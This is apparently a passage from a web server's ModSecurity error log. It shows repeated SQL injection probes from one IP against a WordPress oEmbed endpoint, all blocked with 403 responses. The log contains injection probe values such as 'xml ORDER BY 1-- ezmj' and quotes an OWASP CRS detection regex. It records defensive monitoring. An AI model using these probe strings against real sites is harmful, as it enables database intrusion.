141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml ORDER BY 1-- ezmj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27NHxeJlWfH1pdny5XsgAAAMU"] [Thu Aug 15 03:24:20.509923 2024] [:error] [pid 31519:tid 139653931849472] [client 141.98.81.52:57318] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27NHxeJlWfH1pdny5XswAAAMg"] [Thu Aug 15 03:24:20.955874 2024] [:error] [pid 31519:tid 139653873100544] [client 141.98.81.52:57320] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27NHxeJlWfH1pdny5XtAAAAM8"] [Thu Aug 15 03:24:21.485851 2024] [:error] [pid 31519:tid 139653797566208] [client 141.98.81.52:57322] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27NXxeJlWfH1pdny5XtQAAANg"] [Thu Aug 15 03:24:21.936331 2024] [:error] [pid 31337:tid 139654049679104] [client 141.98.81.52:57324] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27NewCyyCVFXh0DMS2sAAAAII"] [Thu Aug 15 03:24:22.267048 2024] [:error] [pid 31337:tid 139653915064064] [client 141.98.81.52:57326] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27NuwCyyCVFXh0DMS2sQAAAIo"] [Thu Aug 15 03:24:22.730592 2024] [:error] [pid 31337:tid 139654024500992] [client 141.98.81.52:57328] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27NuwCyyCVFXh0DMS2sgAAAIU"] [Thu Aug 15 03:24:23.350148 2024] [:error] [pid 31337:tid 139653923456768] [client 141.98.81.52:57330] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27N-wCyyCVFXh0DMS2swAAAIk"] [Thu Aug 15 03:24:23.813170 2024] [:error] [pid 31519:tid 139653948634880] [client 141.98.81.52:57332] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27N3xeJlWfH1pdny5XtgAAAMY"] [Thu Aug 15 03:24:24.252229 2024] [:error] [pid 31337:tid 139653797566208] [client 141.98.81.52:57334] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27OOwCyyCVFXh0DMS2tAAAAJg"] [Thu Aug 15 03:24:24.616146 2024] [:error] [pid 31337:tid 139653898278656] [client 141.98.81.52:57336] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27OOwCyyCVFXh0DMS2tQAAAIw"] [Thu Aug 15 03:24:25.372227 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:57338] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml) ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27OXxeJlWfH1pdny5XtwAAAM0"] [Thu Aug 15 03:24:25.717977 2024] [:error] [pid 31519:tid 139653923456768] [client 141.98.81.52:57340] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27OXxeJlWfH1pdny5XuAAAAMk"] [Thu Aug 15 03:24:26.205284 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:57342] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27OnxeJlWfH1pdny5XuQAAAME"] [Thu Aug 15 03:24:26.740192 2024] [:error] [pid 31519:tid 139653940242176] [client 141.98.81.52:57344] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27OnxeJlWfH1pdny5XugAAAMc"] [Thu Aug 15 03:24:27.281653 2024] [:error] [pid 31519:tid 139653839529728] [client 141.98.81.52:57346] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27O3xeJlWfH1pdny5XuwAAANM"] [Thu Aug 15 03:24:27.618360 2024] [:error] [pid 31519:tid 139653915064064] [client 141.98.81.52:57348] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27O3xeJlWfH1pdny5XvAAAAMo"] [Thu Aug 15 03:24:28.136259 2024] [:error] [pid 31337:tid 139653873100544] [client 141.98.81.52:57350] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27POwCyyCVFXh0DMS2tgAAAI8"] [Thu Aug 15 03:24:28.678291 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:57352] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27PHxeJlWfH1pdny5XvQAAANI"] [Thu Aug 15 03:24:29.157449 2024] [:error] [pid 31519:tid 139653881493248] [client 141.98.81.52:57354] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27PXxeJlWfH1pdny5XvgAAAM4"] [Thu Aug 15 03:24:29.622992 2024] [:error] [pid 31337:tid 139653906671360] [client 141.98.81.52:57356] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27PewCyyCVFXh0DMS2twAAAIs"] [Thu Aug 15 03:24:30.143408 2024] [:error] [pid 31335:tid 139653889885952] [client 141.98.81.52:57358] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27Pm0MD5oChETZltkVbQAAAA0"] [Thu Aug 15 03:24:30.643003 2024] [:error] [pid 31337:tid 139653948634880] [client 141.98.81.52:57360] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27PuwCyyCVFXh0DMS2uAAAAIY"] [Thu Aug 15 03:24:31.023911 2024] [:error] [pid 31337:tid 139653881493248] [client 141.98.81.52:57362] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27P-wCyyCVFXh0DMS2uQAAAI4"] [Thu Aug 15 03:24:31.521541 2024] [:error] [pid 31519:tid 139653864707840] [client 141.98.81.52:57364] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27P3xeJlWfH1pdny5XvwAAANA"] [Thu Aug 15 03:24:32.007475 2024] [:error] [pid 31337:tid 139653839529728] [client 141.98.81.52:57366] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27QOwCyyCVFXh0DMS2ugAAAJM"] [Thu Aug 15 03:24:32.493100 2024] [:error] [pid 31336:tid 139653889885952] [client 141.98.81.52:57368] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27QEPAyXqJhbW53WyPbwAAAE0"] [Thu Aug 15 03:24:32.919689 2024] [:error] [pid 31337:tid 139654058071808] [client 141.98.81.52:57370] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27QOwCyyCVFXh0DMS2uwAAAIE"] [Thu Aug 15 03:24:33.310056 2024] [:error] [pid 31337:tid 139653814351616] [client 141.98.81.52:57372] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27QewCyyCVFXh0DMS2vAAAAJY"] [Thu Aug 15 03:24:33.801914 2024] [:error] [pid 31336:tid 139653814351616] [client 141.98.81.52:57374] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27QUPAyXqJhbW53WyPcAAAAFY"] [Thu Aug 15 03:24:34.285039 2024] [:error] [pid 31336:tid 139653831137024] [client 141.98.81.52:57376] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 